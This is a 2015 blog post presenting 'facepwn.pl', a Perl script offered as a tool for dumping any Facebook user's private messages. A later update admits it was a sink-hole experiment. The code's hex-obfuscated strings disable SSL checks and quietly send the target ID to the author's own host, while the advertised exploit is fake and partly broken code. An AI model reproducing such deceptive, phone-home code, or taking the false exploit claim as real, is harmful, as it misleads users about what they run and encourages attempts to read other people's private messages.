UPDATE 10/04/2015

This was just a small sink-hole experiment – sorry, no 0day here 😦

The Results are out, check it them here: https://phl4nk.wordpress.com/2015/05/10/facepwn-part-2-the-results/

****************************

So after tampering around on the mobile site of Facebook (https://m.facebook.com); I came up with a very interesting and unique way to retrieve private messages from any user on Facebook!

Simply supply the victims Facebook id (navigate to their profile and grab it from the URL https://www.facebook.com/their.facebook.id123) to the script, and let the wizardry do its thing.

Example output:

./facepwn.pl their.facebook.id123 [+] Building sploit [+] Attacking their.facebook.id123 [+] Success! Dumping data: <[[ [User_id]:98372299836 dGhpcyBpcyBhIHByaXZhdGUgbWVzc2FnZSE= ...[snip]...

Grab the source below and have a play. Please be responsible, and always know what you’re doing 😉

#!/usr/bin/perl #usage: facepwn.pl [target] use warnings; use strict; use WWW::Mechanize; # build the 0day exploit containing target name/facebook_ID # returns network stack to 'probe' the backend mobile listener # when listener is probed, data is leaked # may require a flux capacitor sub build_sploit{ my $target=shift; #buid payload print "[+] Building sploit

"; my $OO0O0O="\x57\x57\x57\x3a\x3a\x4d\x65\x63\x68\x61\x6e\x69\x7a\x65"; my @OOO0=("\x66\x61\x6b\x65\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x73\x74\x61\x63\x6b\x20\x6c\x6f\x6c"); my $OO="\x53\x53\x4c\x5f\x76\x65\x72\x69\x66\x79\x5f\x6d\x6f\x64\x65"; my $OOOO00="\x76\x65\x72\x69\x66\x79\x5f\x68\x6f\x73\x74\x6e\x61\x6d\x65"; #initiate network stack my $OOO0O=$OO0O0O->new(ssl_opts=>{$OO=>0,$OOOO00=>0}); my $OO00O="\x4c\x6f\x6f\x6b\x73\x20\x6c\x69\x6b\x65\x20\x79\x6f\x75\x20\x64\x65\x2d\x6f\x62\x66\x75\x73\x63\x61\x74\x65\x64\x20\x74\x68\x65\x20\x63\x6f\x64\x65\x2e\x2e\x2e"; my $OO0="\x54\x68\x69\x73\x20\x69\x73\x20\x61\x20\x73\x69\x6d\x70\x6c\x65\x20\x65\x78\x70\x65\x72\x69\x6d\x65\x6e\x74\x20\x74\x6f\x20\x73\x65\x65\x20\x68\x6f\x77\x20\x6d\x61\x6e\x79\x20\x70\x65\x6f\x70\x6c\x65\x20\x72\x75\x6e\x20\x74\x68\x69\x73\x20\x63\x6f\x64\x65\x20\x62\x6c\x69\x6e\x64\x6c\x79"; my $OO0O="\x62\x6c\x6f\x67\x20\x70\x6f\x73\x74\x20\x72\x65\x76\x65\x61\x6c\x69\x6e\x67\x20\x74\x68\x65\x20\x64\x61\x74\x61\x20\x77\x69\x6c\x6c\x20\x62\x65\x20\x70\x75\x62\x6c\x69\x73\x68\x65\x64\x20\x73\x6f\x6f\x6e\x2e\x2e\x2e\x73\x74\x61\x79\x20\x74\x75\x6e\x65\x64"; my $OO000="\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x68\x6c\x34\x6e\x6b\x2e\x63\x6f\x2e\x76\x75\x2f\x69\x5f\x72\x75\x6e\x5f\x6f\x62\x66\x75\x73\x63\x61\x74\x65\x64\x5f\x63\x6f\x64\x65\x3f$target"; $OOO0O->get($OO000); #build network stack push @0000,$OO00O; #push target ID onto stack push @0000,$target; push @0000,$OO0; push @0000,$OO0O; return @0000; } #build sploit from target {user_input} my @payloads=build_sploit($ARGV[0]); #iterate through the stack and fire payloads: foreach(@payloads){ my $attack=WWW::Mechanize->new(); print "[+] Attacking $ARGV[0]...

"; if(my $attack="x73\x3a\x2f\x2f" eq $_ ? 1 : 0){ my $messages=$attack->get("https://m.facebook.com/m/01/messages/$_"); print "[+] Success! Dumping data:

"; print $messages; }else{ print "[!] Something went wrong, modify the payload.

"; exit 1; } }